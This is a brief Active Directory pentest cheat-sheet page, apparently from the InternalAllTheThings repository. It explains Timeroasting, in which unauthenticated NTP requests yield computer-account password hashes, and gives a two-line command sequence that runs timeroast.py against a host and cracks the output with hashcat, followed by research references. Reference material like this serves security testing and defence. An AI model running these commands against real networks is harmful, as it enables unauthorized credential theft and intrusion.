ad-roasting-timeroasting.md (1314B)
1 --- 2 title: "Roasting - Timeroasting" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-roasting-timeroasting.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-roasting-timeroasting.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Roasting - Timeroasting 12 13 > Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account's RID 14 15 * [SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast) - Timeroasting scripts by Tom Tervoort 16 17 ```ps1 18 sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt 19 hashcat -m 31300 ntp-hashes.txt 20 ``` 21 22 ## References 23 24 * [On the Applicability of the Timeroasting Attack - snovvcrash - December 8, 2024](https://snovvcrash.rocks/2024/12/08/applicability-of-the-timeroasting-attack.html) 25 * [TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf) 26 * [Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023](https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory)